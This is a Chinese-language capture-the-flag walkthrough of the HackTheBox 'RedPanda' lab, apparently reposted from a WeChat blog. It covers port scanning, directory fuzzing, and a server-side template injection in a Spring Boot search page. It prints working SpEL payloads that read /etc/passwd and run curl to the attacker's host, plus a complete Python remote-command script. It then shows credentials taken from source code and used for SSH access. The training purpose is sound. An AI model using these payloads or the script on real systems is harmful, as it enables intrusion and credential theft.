靶场类型
信息收集
Nmap
nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.170
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-23 09:15 CST
Nmap scan report for 10.10.11.170
Host is up (0.41s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open http-proxy
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-US
| Date: Sun, 23 Oct 2022 01:16:00 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en" dir="ltr">
| <head>
| <meta charset="utf-8">
| <meta author="wooden_k">
| <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw -->
| <link rel="stylesheet" href="css/panda.css" type="text/css">
| <link rel="stylesheet" href="css/main.css" type="text/css">
| <title>Red Panda Search | Made with Spring Boot</title>
| </head>
| <body>
| <div class='pande'>
| <div class='ear left'></div>
| <div class='ear right'></div>
| <div class='whiskers left'>
| <span></span>
| <span></span>
| <span></span>
| </div>
| <div class='whiskers right'>
| <span></span>
| <span></span>
| <span></span>
| </div>
| <div class='face'>
| <div class='eye
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET,HEAD,OPTIONS
| Content-Length: 0
| Date: Sun, 23 Oct 2022 01:16:01 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Sun, 23 Oct 2022 01:16:02 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Red Panda Search | Made with Spring Boot
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=10/23%Time=635495D0%P=arm-apple-darwin21.5.0%
SF:r(GetRequest,690,"HTTP/1.1x20200x20rnContent-Type:x20text/html;ch
SF:arset=UTF-8rnContent-Language:x20en-USrnDate:x20Sun,x2023x20Oct
SF:x202022x2001:16:00x20GMTrnConnection:x20closernrn<!DOCTYPEx2
SF:0html>n<htmlx20lang="en"x20dir="ltr">nx20x20<head>nx20x20
SF:x20x20<metax20charset="utf-8">nx20x20x20x20<metax20author="w
SF:ooden_k">nx20x20x20x20<!--Codepenx20byx20khr2003:x20https://co
SF:depen.io/khr2003/pen/BGZdXwx20-->nx20x20x20x20<linkx20rel="sty
SF:lesheet"x20href="css/panda.css"x20type="text/css">nx20x20x2
SF:0x20<linkx20rel="stylesheet"x20href="css/main.css"x20type="te
SF:xt/css">nx20x20x20x20<title>Redx20Pandax20Searchx20|x20Made
SF:x20withx20Springx20Boot</title>nx20x20</head>nx20x20<body>nn
SF:x20x20x20x20<divx20class='pande'>nx20x20x20x20x20x20<divx20
SF:class='earx20left'></div>nx20x20x20x20x20x20<divx20class='ear
SF:x20right'></div>nx20x20x20x20x20x20<divx20class='whiskersx20le
SF:ft'>nx20x20x20x20x20x20x20x20x20x20<span></span>nx20x20x
SF:20x20x20x20x20x20x20x20<span></span>nx20x20x20x20x20x20x
SF:20x20x20x20<span></span>nx20x20x20x20x20x20</div>nx20x20x
SF:20x20x20x20<divx20class='whiskersx20right'>nx20x20x20x20x20
SF:x20x20x20<span></span>nx20x20x20x20x20x20x20x20<span></span>
SF:nx20x20x20x20x20x20x20x20<span></span>nx20x20x20x20x20x
SF:20</div>nx20x20x20x20x20x20<divx20class='face'>nx20x20x20x
SF:20x20x20x20x20<divx20class='eye")%r(HTTPOptions,75,"HTTP/1.1x202
SF:00x20rnAllow:x20GET,HEAD,OPTIONSrnContent-Length:x200rnDate:x
SF:20Sun,x2023x20Octx202022x2001:16:01x20GMTrnConnection:x20close
SF:rnrn")%r(RTSPRequest,24E,"HTTP/1.1x20400x20rnContent-Type:x20t
SF:ext/html;charset=utf-8rnContent-Language:x20enrnContent-Length:x2
SF:0435rnDate:x20Sun,x2023x20Octx202022x2001:16:02x20GMTrnConnec
SF:tion:x20closernrn<!doctypex20html><htmlx20lang="en"><head><tit
SF:le>HTTPx20Statusx20400x20xe2x80x93x20Badx20Request</title><styl
SF:ex20type="text/css">bodyx20{font-family:Tahoma,Arial,sans-serif;}x
SF:20h1,x20h2,x20h3,x20bx20{color:white;background-color:#525D76;}x20
SF:h1x20{font-size:22px;}x20h2x20{font-size:16px;}x20h3x20{font-size:
SF:14px;}x20px20{font-size:12px;}x20ax20{color:black;}x20.linex20{h
SF:eight:1px;background-color:#525D76;border:none;}</style></head><body><h
SF:1>HTTPx20Statusx20400x20xe2x80x93x20Badx20Request</h1></body></
SF:html>");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=10/23%OT=22%CT=1%CU=40350%PV=Y%DS=2%DC=T%G=Y%TM=635496
OS:14%P=arm-apple-darwin21.5.0)SEQ(SP=103%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A
OS:)OPS(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M53
OS:9ST11NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88
OS:)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
OS:T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A
OS:=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%D
OS:F=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=4
OS:0%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
1 537.83 ms 10.10.14.1
2 537.94 ms 10.10.11.170
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.28 seconds
Http
挺可爱一小熊猫,还会眨眼睛
在下面有个搜索框,随便搜点东西看看
看着交互界面,确实会去数据库进行交互查询,这种潜意识就觉得可能会有注入
没测试出什么东西,去 fuzz 试试吧
Fuzz
lucifiel@MacBookPro ~ ffuf -u 'http://10.10.11.170:8080/FUZZ' -w /Users/lucifiel/Documents/Penetration/SecLists/Discovery/Web-Content/raft-medium-directories.txt -t 200
/'___ /'___ /'___
/ __/ / __/ __ __ / __/
,__\ ,__/ / ,__
_/ _/ _ _/
_ _ ____/ _
/_/ /_/ /___/ /_/
v1.5.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.170:8080/FUZZ
:: Wordlist : FUZZ: /Users/lucifiel/Documents/Penetration/SecLists/Discovery/Web-Content/raft-medium-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
stats [Status: 200, Size: 987, Words: 200, Lines: 33, Duration: 619ms]
error [Status: 500, Size: 86, Words: 1, Lines: 1, Duration: 617ms]
search [Status: 405, Size: 117, Words: 3, Lines: 1, Duration: 616ms]
[Status: 200, Size: 1543, Words: 368, Lines: 56, Duration: 401ms]
:: Progress: [30000/30000] :: Job [1/1] :: 8724 req/sec :: Duration: [0:00:41] :: Errors: 10271 ::
有一个 stats 目录,去看一下
这边发现了一些图片,去尝试读取试试
这里提示确实是有注入的,不过有一说一,这图片确实挺有意思的
不过既然 sql 注入不行,那就试试 ssti 呗,反正可以确定漏洞在于注入了
测试出来了 语法是 *{7*7},把 ssti 语句中的 $ 替换为 * 即可绕过
漏洞利用
我们通过 nmap 的扫描结果可得知,这个网站使用的是 Spring Boot,所以可以确定是一个 java 的程序
所以我们去 ssti 的利用语句里找一下
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
woodenk:x:1000:1000:,,,:/home/woodenk:/bin/bash
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
成功读取到 /etc/passwd 文件
虽然可以了,但是转换格式还是有点麻烦,所以我又找到了一篇文章
https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("whoami")}
直接执行似乎会提示错误,去开一个 http 服务试试
python3 -m http.server 80
然后改一下指令,来请求试试
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://10.10.14.2")}
lucifiel@MacBookPro ~ python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.10.11.170 - - [23/Oct/2022 10:02:07] "GET / HTTP/1.1" 200 -
直接搞个 rce 脚本吧
#!/usr/bin/python3
import requests
from cmd import Cmd
from bs4 import BeautifulSoup
print("""
__ __ __ ______ __ _______ __ _______ __
| | | | | | / | | | | ____| | | | ____| | |
| | | | | | | ,----' | | | |__ | | | |__ | |
| | | | | | | | | | | __| | | | __| | |
| `----. | `--' | | `----. | | | | | | | |____ | `----.
|_______| ______/ ______| |__| |__| |__| |_______| |_______|
""")
class RCE(Cmd):
prompt = "33[1;31m$33[1;37m "
def decimal(self, args):
comando = args
decimales = []
for i in comando:
decimales.append(str(ord(i)))
payload = "*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)" % decimales[0]
for i in decimales[1:]:
payload += ".concat(T(java.lang.Character).toString({}))".format(i)
payload += ").getInputStream())}"
data = { "name": payload }
requer = requests.post("http://10.10.11.170:8080/search", data=data)
parser = BeautifulSoup(requer.content, 'html.parser')
grepcm = parser.find_all("h2")[0].get_text()
result = grepcm.replace('You searched for:','').strip()
print(result)
def default(self, args):
try:
self.decimal(args)
except:
print("%s: command not found" % (args))
RCE().cmdloop()
lucifiel@MacBookPro ~/Desktop python3 exploip.py
__ __ __ ______ __ _______ __ _______ __
| | | | | | / | | | | ____| | | | ____| | |
| | | | | | | ,----' | | | |__ | | | |__ | |
| | | | | | | | | | | __| | | | __| | |
| `----. | `--' | | `----. | | | | | | | |____ | `----.
|_______| ______/ ______| |__| |__| |__| |_______| |_______|
$ whoami
woodenk
$ id
uid=1000(woodenk) gid=1001(logs) groups=1001(logs),1000(woodenk)
可以成功执行,但是还是没有 shell 方便,先去看看有没有什么可以拿到 shell 的东西吧
在文件 /opt/panda_search/src/main/java/com/panda_search/htb/panda_search/MainController.java 中,找到了一段凭证
conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/red_panda", "woodenk", "RedPandazRule");
username = woodenk
password = RedPandazRule
lucifiel@MacBookPro ~/Desktop ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-121-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 24 Oct 2022 03:15:10 AM UTC
System load: 0.02
Usage of /: 80.9% of 4.30GB
Memory usage: 41%
Swap usage: 0%
Processes: 213
Users logged in: 0
IPv4 address for eth0: 10.10.11.170
IPv6 address for eth0: dead:beef::250:56ff:feb9:1c2
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Oct 24 03:14:58 2022 from 10.10.14.11
woodenk@redpanda:~$ whoami&&id
woodenk
uid=1000(woodenk) gid=1000(woodenk) groups=1000(woodenk)
成功拿到 user 权限的 shell
woodenk@redpanda:~$ cat user.txt
a00d4342cd040f667d3dbfee34a49451
成功拿到 user 权限的 flag 文件
权限提升
原文始发于微信公众号(路西菲尔的故事汇):Hackthebox - RedPanda 靶场实战
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论